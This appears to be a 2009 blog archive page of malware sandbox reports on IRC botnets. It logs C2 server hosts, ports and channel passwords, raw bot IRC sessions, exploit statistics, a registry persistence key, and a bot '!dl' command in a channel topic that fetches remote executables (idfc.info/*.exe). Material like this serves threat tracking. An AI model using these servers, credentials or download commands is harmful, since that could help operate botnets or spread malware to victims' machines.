Month: September 2009

Remote Host Port Numberlpw.ms6ol.net 9899 NICK Cyb3r-ecdctqUSER gkpotu “” “lrj” :gkpotu

Remote Host Port Number206.123.121.175 6667 NICK CupidoUSER Bruxelles “” “hackschool.mooo.com” :Von Lude

Remote Host Port Number67.215.1.206 8072.10.172.214 1289 * The data identified by the following URLs was then requested from the remote web server: o http://idfc.info/nadnad.exe o http://idfc.info/jiri.exe NICK pshnsuhUSER urlytdp “” “ngs” :urlytdpPRIVMSG #xddc3 :Failed. Now talking in ##xddcTopic On: [ ##xddc ] [ !dl http://idfc.info/so8.exe p3xddy.exe 1 ]Topic By: [ always ]Modes On: [ ##xddcRead more...

Remote Host Port Number67.43.236.67 10324 USER eiwjeh eiwjeh eiwjeh :hmtjdmgbdezonwtjNICK FAkAYdzQMODE FAkAYdzQ +xiJOIN #las6USERHOST FAkAYdzQMODE #m +smntuPRIVMSG #m :-– Running TFTP wormride threadMODE #las6 +smntu Topic On: [ #m ] [ =MIDfOh3VBIUm3mTH527LDMu+p9TpFz6iwDmtgMf9QIz3IJ4j3dVWgm3s18S7KGE4i6ugfOnZfW9KpiNPvvyb8f8p5/ONCi6cN0vmh3xt47jIPeoUfwjFqHk86INwp99KpB0gJFtfH5liGlPBVtylu7X/mZPz3gL0zdXujQTPncg4F1l2UygfQLgJYL/nABJ ]Topic By: [ tcrqtvgpohc ]Modes On: [ #m ] [ +smntSMCu ]

174.132.181.27:6667 Nick: N00|192|AUT|XPSP3|Administrator|XLUsername: pgvrJoined Channel: #FFChannel Topic for Channel #FF: “.msn”Channel Topic for Channel #botnet: “^BKimse girish banlanacaq”

infos herehttp://www.threatexpert.com/report.aspx?md5=313ae0250e7b5f7170213d0ac8e88700

windows-irc-priv8.sytes.net:6667 NICK [XP]|59372USER pltehxk 0 0 :[XP]|59372USERHOST [XP]|59372MODE [XP]|59372 -x+iJOIN #BotsMODE #Bots +sntpNOTICE [XP]|59372 :.VERSION mIRC v6.14 Khaled Mardam-Bey.PRIVMSG #Bots :[MAIN]: Status: Ready. Bot Uptime: 0d 0h 0m.PRIVMSG #Bots :[MAIN]: Bot ID: Mp.PRIVMSG #Bots :[SCAN]: Exploit Statistics: NetBios : 0, NTPass: 0, Dcom135: 0, Dcom445: 0, Dcom1025: 0, Dcom2-135: 0, Dcom2-455: 0, IIS5SSL: 0, WebDav:Read more...

Remote Host Port Number82.146.51.228 6667 NICK USA|432332USER agjynqb 0 0 :USA|432332JOIN #paarmy p00pUSERHOST USA|432332MODE USA|432332 -x+BPONG :irc.AA0.com

* To mark the presence in the system, the following Mutex object was created: o eLecTr0 * The following ports were open in the system: Port Protocol Process1033 TCP svchost.exe.exe (%Windir%svchost.exe.exe)1034 TCP svchost.exe.exe (%Windir%svchost.exe.exe) Remote Host Port Numberb1n.th3kings.net 27034 PASS bbbbbbbNICK [00|USA|937325]USER XP-0692 * 0 :COMPUTERNAME Resolved : [b1n.th3kings.net] To [203.154.27.138]

Remote Host Port Numberalm.alm7.net 7000 78.129.223.128:7000Nick: rcoepgUsername: aclqjsServer Pass: trb123trbJoined Channel: #lala1 with Password trb123trb PASS trb123trbNICK fxumqmUSER yxptgt “” “suo” :yxptgt Resolved : [alm.alm7.net] To [78.129.223.128] Registry Modifications * The following Registry Key was created: o HKEY_LOCAL_MACHINESOFTWAREMicrosoftActive SetupInstalled Components{28ABC5C0-4FCB-11CF-AAX5-81CX1C635612} * The newly created Registry Value is: o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftActive SetupInstalled Components{28ABC5C0-4FCB-11CF-AAX5-81CX1C635612}] + StubPath = “c:RECYCLERS-1-5-21-1482476501-1644491937-682003330-1013ise32.exe”Read more...